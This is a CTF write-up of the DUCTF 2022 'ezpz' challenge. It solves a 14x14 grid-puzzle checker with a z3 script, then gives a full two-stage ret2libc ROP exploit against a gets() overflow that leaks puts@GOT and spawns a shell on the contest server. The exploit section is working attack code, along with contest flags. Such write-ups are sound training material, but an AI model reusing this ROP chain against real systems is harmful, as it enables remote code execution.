Trying out z3 Solver (DUCTF2022 - EZPZ RE + pwn)

Description

Recently, I have started to play CTF. When doing big reverse engineering work, especially where parts may contain many arithmetic operations like when creating KeyGen, I believe that z3 is a really useful with the analysis. And since this is my first time trying out the Z3 Theorem Prover, I think it would be nice to note that down as part of my journey!

In this post, I will deal mostly with the reversing and z3, but will not go too much into details about the pwning part since its a typical gets and ret2libc type challenge with a relatively old libc version. Also, I will go through the decompiled code with my renamed variable names which I hope is accurate.

Let’s Begin ( EZPZ-REV )

When trying out the application, there were no outputs and was expected to put in any values. So, for short and incorrect values, we get the string “Incorrect!” and when we input long string, we get Segmentation Fault.

Testing inputs

After some reverse engineering and reformatting, we observe that there are 4 conditions that we need to meet before the flag is read and printed out.

/images/ductf2022ezpz

One thing to note, the result from of the long string that was passed into the function can be treated as a hardcoded value via reading the value dynamically.

Condition 1

cond1

In the first condition, it accepts the puzzle input as a 1D array which is calculated as a 2D array. It checks every row ( in steps of 14 ). For each row, it will see if the puzzle cell contains the value ‘1’. Finally, number of value ‘1’s must be 3.

Now, we can start the script for the first condition. We first create the Solver object added the constraints of value being 1 and 0. Also, the puzzle cells values should be followed and therefore, the list comprehension is there to indicate to the solver the puzzle cells are the value we are trying to solve. At the end of writing the condition, we add another constraint that the number of ones should be 3. The reason that we can add puzzle cell directly is because of the first constraint of values being integer 1 or integer 0.

Condition 2

This function is highly similar in construct as condition 1. Instead, it will loop through each column cell to check of the number of value ‘1’s. Again, we see that if the number of ‘1’s is not three, then it will fail.

Very similar to the previous condition, this is the script that helped satisfy the second condition.

/images/ductf2022ezpz

Condition 3

cond3

This condition is the only one that deals with the decoded string. This decoded string has length of 196. It’s value is used to map idx of the result_store[idx]. Ultimately, the each values in the result_store should contain the number 3.

The mapping is basically :

'a'  ==  'a'-'a'  == 0
'b'  ==  'b'-'a'  == 1
'c'  ==  'c'-'a'  == 2
...
...
'n'  ==  'n'-'a'  == 14

To update the result_store entries :

    For each cell in the puzzle, 
        if the value is '1'
            add one to the `result_store[idx]`

To check for correctness :

    For i in result_store:
        i == 3 

With that, we can convert these into a script. After understanding the condition, we have to reverse this into a function and add the constraints.

/images/ductf2022ezpz

Condition 4 (Last condition)

Since I could not contain the decompiled code into one screenshot, I have dumped it here instead.

__int64 __fastcall check_no_adjacent_ones_sub_4013B2(char *decoded, char *input_buffer)
{
  char *input; // rdi
  int start_index; // er8
  __int64 v4; // rbx
  unsigned __int64 v5; // r10
  unsigned int indexed_cell; // edx
  int *index; // rcx
  int index_; // edx
  unsigned __int64 v9; // r10
  __int64 column_idx; // rax
  int index_array[8]; // [rsp+0h] [rbp-30h] BYREF
  __int64 v13; // [rsp+20h] [rbp-10h] BYREF

  input = input_buffer;
  start_index = 0;
  v4 = 0x10004001LL;
  while ( 2 )                                   // for each column in a row
  {
    for ( column_idx = 0LL; column_idx != 14; ++column_idx )
    {
      if ( input[column_idx] == '1' )           // if input_buffer value is 1
      {
        index_array[0] = -1;
        index_array[1] = -15;
        index_array[2] = -14;
        index_array[3] = -13;
        index_array[4] = 1;
        index_array[5] = 15;
        index_array[6] = 14;
        index_array[7] = 13;
        for ( index = index_array; &v13 != (__int64 *)index; ++index )// for each of the specified numbers
        {
          index_ = *index;
          if ( (_DWORD)column_idx )             // if not the first column of any row
          {
            if ( (_DWORD)column_idx == 13 )     // last entry in the row ( edge )
            {
              v9 = (unsigned int)(index_ + 13);
              if ( (unsigned int)v9 <= 0x1C )
              {
                if ( _bittest64(&v4, v9) )      // test if it falls on  position 0, 14 or 28
                  continue;
              }
            }
          }
          else                                  // if first column of any row
          {
            v5 = (unsigned int)(index_ + 15);
            if ( (unsigned int)v5 <= 0x1C && _bittest64(&v4, v5) )
              continue;
          }
          indexed_cell = start_index + column_idx + index_;
          // Within range and not 1
          // this means that we are looking to see that there are no adjacent cell
          // containing the value 1 if the current cell is holding the value of 1
          if ( indexed_cell <= 0xC3 && input_buffer[indexed_cell] == '1' )
            return 0LL;
        }
      }
    }
    start_index += 14;                          // go next row
    input += 14;
    if ( input != input_buffer + 196 )          // check end of puzzle
      continue;
    break;
  }
  return 1LL;
}

The index_array values are values used in calculation to see if the current cell that was processed is at the boundaries of the puzzle. This is important because the program is checking if the adjacent cells contains the value ‘1’ if current cell itself is containing the value ‘1’.

           000             100
           011             000 
           000             001

PASS            FAIL            PASS

Also, we see the _bittest64 instruction was used in the assembly to check against the hex value 0x10004001. That is fancy way of checking if the value is either 0, 14 or 28. Now, if no value ‘1’s are adjacent to each other in all eight directions, then we pass this condition.

To represent this in the script, I have googled on how to find all adjacent elements of given element in a 2d array or matrix and I ended up adapting it into the script. I have also inlined the isValidPos from the post to fit the condition into one function.

At this point, we have all we need to make sure that the conditions are correct. To confirm that this is doable, we have to check for satisfiability and print out the evaluated puzzle cell values. The script will look like this.

The Solve Script

root@ubuntu:~/CTF/ductf2022/ezpz-rev-pwn# cat solve.py 
from pwn import *
from z3 import * 
s = Solver()

def print_puzzle(puzzle):
    for i in range(0,14*14,14):
        print(puzzle[i:i+14])


# check that each row and column has just three '1's each 

puzzle= [Int('puzzle_%s'%(i)) for i in range(14*14)]
# make sure all value sin the puzzle are either 0 or 1
for i in range(14*14):
    s.add(puzzle[i] <=1)
    s.add(puzzle[i] >= 0)

# sub_401239
for r in range(14):
    count_each_row = 0
    for c in range(14):
        count_each_row += puzzle[r*14+c]
    s.add(count_each_row == 3)

# sub_40129E
for c in range(14):
    count_each_column = 0
    for r in range(14):
        count_each_column +=  puzzle[c + r*14]
    s.add(count_each_column == 3)

decoded_value = "aaaaabbbbcccddaaaaabbbbccccdaaeaaabbbccccdaaefaabbbcccgdeeefffffbccggdfeeffffggggggdfffffffhhhgggdffffhhhhhhgggdffijjjjhkkllmdiiijjkkkkkllmmiijjjkkkklllmmiijjjkkkklllmmijjjjjkknnllmmijjjjnnnnnllll"



# this is to store to the correct store idx when it meets store_idx + ord('a')
# for those that has value of '1', check the index at the decoded_value and store them in 
# the result_store. Each entries in the result store shoudl be 3 each or it will fail
"""
    // if decoded idx is 'a' then store at index 0 in result_store
    // if decoded idx is 'b' then store at index 1 in result_store 
    // ...
    // ...
"""
for store_idx in range(14):
    count = 0
    for i in range(14*14): # For all puzzle cells , also the size of decoded value
        if chr(ord('a') + store_idx) == decoded_value[i]: 
            count += puzzle[i]  # due to constraint, we can just add the cell value (0 or 1)
    s.add(count == 3)
       
# detect whether adjacent cells of the puzzle that contains 1 do not contain it as well.

for i in range(14):
    for j in range(14):

        # used to fit the whole 8 conditions from validPos into a for loop
        left = [-1,-1,-1,0,0,1,1,1]
        right = [-1,0,1,-1,1,-1,0,1]
        count = 0
        for k in range(len(left)):
            if not ((i+left[k]) < 0 or 
                    (j+right[k])< 0 or 
                    (i+left[k]) > (14 - 1) or 
                    (j+right[k]) > (14 - 1)): # if valid adjacent cell is present
                count += puzzle[(i+left[k])*14+(j+right[k])] 

        # the muliplying i believe forces the relation with puzzle cells in z3 or anything goes
        s.add((count*puzzle[i*14+j]) == 0) 


password = ""
if s.check() == sat:
    m = s.model()
    answer = [m.evaluate(puzzle[i]) for i in range(14*14)]
    
    for i in answer:
        password+= str(i)
    print("")
    print(password)

else:
    print("Problem is unsatisfiable :(")
    pass

print("end program")

p = remote("2022.ductf.dev",30005)
p.recvrepeat(1)
p.sendline(password.encode())
p.interactive()

Running this will get us the flag if all goes well.

DUCTF{gr1d_puzzl3s_ar3_t00_ez_r1ght?}

Now to the PWN

So where is the bug? Well, you probably have already noticed that it uses the vulnerable function gets which allows us to write any buffer length of data into the stack buffer. The only reason we cannot start the pwn challenge immediately is because we do want to exit the program. We need it to get the flag for ezpz-rev and eventually reach the ret instruction of this function.

Now that we know the puzzle input to get the flag, we can reach the ret statement after inputting more than 232 characters before do any changes to the instruction pointer. Before continuing, we also know that no canaries is there to block the overflow attempt, no pie is there to mess up the instruction address of the binary and that NX is enabled. This suggest that we can use ROP chain to ret2libc. It is also convenient that the libc used on the server was provided as well. ]

Exploit Step and Script

First Stage:

Puzzle cells + padding to 232
Pop GOT of puts to rdi
ret to puts PLT to leak libc of puts –> puts(puts@GOT)
ret the main function –> restart program

Calculate the libc address based on the offset from the libc file and calculate the address of “/bin/sh” and system

Second Stage:

Puzzle cells + padding to 232
pop address of “/bin/sh” into rdi
ret gadget (to apease MOVAPS in do_system)
ret to system PLT –> system(“/bin/sh”)

from pwn import *

LOCAL = False
libc = ""


if LOCAL:
    libc = ELF("/usr/lib/x86_64-linux-gnu/libc-2.31.so")
    p = process("./ezpz")
else:   
    p = remote("2022.ductf.dev", 30005)
    libc = ELF("libc-2.35.so")


# gadgets
pop_rdi = 0x00000000004015d3
pop_rsi_r15 = 0x00000000004015d1
ret = 0x00000000004015d4


elf = ELF("./ezpz")
puts_offset = libc.symbols['puts']
system_offset = libc.symbols['system']
print("OFFSET : " , puts_offset)
putsPLT = elf.plt['puts']
putsGOT = elf.got['puts']
main_function = 0x00004014A0

#main_plt = elf.symbols['main']


payload = b"0101000000001000000101010000101000000001000000000101000110100000000100000010101000000100000000100100001010100000001000000010101000101000000000000000101010010101000000000000000001010100010101000000AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
payload += p64(pop_rdi) + p64(putsGOT) + p64(putsPLT)
print("putsGOT : ",hex(putsGOT))
payload += p64(main_function)



p.sendline(payload)
leak = (p.recvrepeat(0.6))
print("ORIGINAL LEAK",leak)
leak = u64(leak.split(b"\n\n")[1][:8].ljust(8,b'\x00'))
print("LEAK : " , hex(leak))

libc_base =( leak - puts_offset) & 0xffffffffffff
system_address = libc_base+  system_offset


print("leaked puts libs : " , hex(leak))
print("puts_offset : " , hex(puts_offset))
print("libc_base : " , hex(libc_base))
print("Leaked system libc address : " , hex(system_address))
binsh_offset = next(libc.search(b"/bin/sh"))
print("binsh offset : " , hex(binsh_offset))
binsh_address = binsh_offset + system_address - system_offset
print("/bin/sh string found at ", hex(binsh_address))

p.recvrepeat(0.5)
payload = b"0101000000001000000101010000101000000001000000000101000110100000000100000010101000000100000000100100001010100000001000000010101000101000000000000000101010010101000000000000000001010100010101000000AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
payload += p64(pop_rdi)
payload += p64(binsh_address)
payload += p64(ret)
payload += p64(system_address)

#pause()
p.sendline(payload)
print(p.recvrepeat(0.5))
p.sendline("ls -al")
print(p.recvrepeat(0.5))
p.sendline("cat flag-pwn.txt")


p.interactive()

DUCTF{ez_r3t2l1bc_9b8a81cda3}

Conclusion

I have learnt a lot from and will probably not hesitate (as much) to try z3, I hope … Also, since this is not really a detailed guide to z3, I recommend reading this really tutorial guide from https://ericpony.github.io/z3py-tutorial/guide-examples.htm. It has a lot more inforamtion that I did not really use but it really is beginner friendly!

Understanding 64 bits Windows 10 Shellcode (Calc.exe) - Part 2